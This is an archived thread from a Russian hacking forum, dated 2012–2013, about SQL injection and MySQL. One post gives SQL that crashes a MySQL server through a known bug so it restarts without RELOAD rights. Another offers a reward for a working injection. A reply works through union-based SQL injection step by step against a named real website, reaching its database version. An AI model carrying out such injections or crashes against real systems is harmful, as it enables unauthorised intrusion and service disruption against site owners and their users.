ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.08.2012, 01:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
|
|
|
|
31.08.2012, 01:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
7224
Репутация:
1
|
|
Сообщение от Sat-hacker
Sat-hacker said:
Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
Прога не мутная, тоже надо уметь пользоваться просто
|
|
|
|
01.09.2012, 09:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
|
|
|
|
01.09.2012, 09:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
7224
Репутация:
1
|
|
Сообщение от Sat-hacker
Sat-hacker said:
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
Покажи, что вставляешь..
|
|
|
|
01.09.2012, 10:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
Сообщение от Sat-hacker
Sat-hacker said:
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
хавидж активирован?
|
|
|
|
01.09.2012, 14:10
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Насколько помню проблема решается указыванием корректного Keyword!
|
|
|
13.09.2012, 07:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Не знал куда запостить, сюда наверно логичнее всего...
На статью не тянет, скорее заметка... Но тем не менее просто нужная информация...
Итак, если нам вдруг понадобится срочно перезагрузить MySQL, а прав на RELOAD нет, чтобы выполнить
Код:
Code:
FLUSH PRIVILEGES;
нам могут помочь следующие способы:
Способ №1:
Самый старый из найденных мной, но ни разу нигде не сработавших.
Тем не менее человек на этом форуме утверждает, что это возможно...
Тема 2008 года =)
Кратко: MySQL падает так как надо указывать имя триггера в виде `mydb`.`mytrigger`, а не просто mytrigger.
Код:
Code:
mysql> CREATE TRIGGER mytrigger AFTER INSERT
-> ON `mydb`.`mytable` FOR EACH ROW
-> BEGIN END;
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
OC = Windows XP SP 2
MySQL 5.0.16
Проверил работоспособность на Centos-6.3 2.6.34
Скрин приведён ниже.
Результат - Способ не отработал.
Способ №2:
Заключается в эксплуатации бага #63775
Кратко: MySQL падает при чтении заголовка, следующего за удалённой записью.
Код:
Code:
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#
-- source include/have_innodb.inc
CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
DELETE FROM bug13510739 WHERE c=2;
HANDLER bug13510739 OPEN;
HANDLER bug13510739 READ `primary` = (2);
# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;
DROP TABLE bug13510739;
На оффициальном сайте говорится, что пофиксено начиная с версии 5.1.62
Решил испытать на своей системе, где версия MySQL 5.1.61.
Скрины ниже.
Зависимости:
MySQL 3
Результат - успешный перезапуск MySQL. PROFIT !!!
З.Ы. Это не дублирование - перетащил из другого места, тут логичнее всего оставить.
|
|
|
|
15.11.2012, 01:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Вопрос знатокам в области SQL-инъекций.
Что можно поиметь полезного ??? если на сайте включен отчет об ошибках MySQL и с помощью него (отчета об ошибках) известно , что сайт из POST-запроса фильтрует (тупо убирает) ТОЛЬКО одинарные и двойные кавычки кавычки, остальные символы не фильтрует и передаёт в SQL-запрос как есть.
В частности не фильтрует обратный слэш ( \ ; ascii-код = 92 = 0x5C ) , с помощью которого (+ отчет об ошибках) и выяснено , какие именно символы сервис фильтрует из POST-запроса.
sql-запрос вида
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='postvalue1' AND `id`=postvalue2
postvalue2 всегда приводится к типу integer
hex-фишки типа 0х11 - не работают
сайт режет всю часть строки после нецифрового символа
т.е. postvalue2 , равное 123b456 преобразовывает для sql-запроса в 123
P.S.
за удачную инъекцию - щедрое вознаграждение
|
|
|
|
12.01.2013, 12:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
658
Репутация:
0
|
|
Всем привет, нашел ошибку - http://www.patriciapiccinini.net/news.php?id=46'
Далее что - то не получается никак... Помогите, очень интересно двигаться в этом направлении.
|
|
|
|
12.01.2013, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
satana_name
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=46+order+by+7--+
ошибка
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=46+order+by+6--+
Норм
Посмотрели
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=-46+union+select+1,2,3,4,5,6--+
3
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=-46+union+select+1,2,version(),4,5,6--+
версия
5.0.67-community
дальше читай тему в которой ты отписался, и незачем сюда что то писать! есть отдельная тема |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
